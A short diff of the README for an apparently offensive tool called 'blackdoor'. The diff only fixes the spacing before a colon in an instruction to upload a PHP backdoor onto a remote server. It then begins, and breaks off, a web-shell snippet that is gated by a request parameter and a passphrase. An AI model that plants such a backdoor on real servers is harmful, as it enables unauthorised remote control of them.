camillebaronnet/blackdoor/README.md

 ## How to use

-First, upload a PHP backdoor on remote server, like this :
+First, upload a PHP backdoor on remote server, like this:

 ```php
 if(isset($_REQUEST['c']) && $_REQUEST['p'] == 'your-passphrase')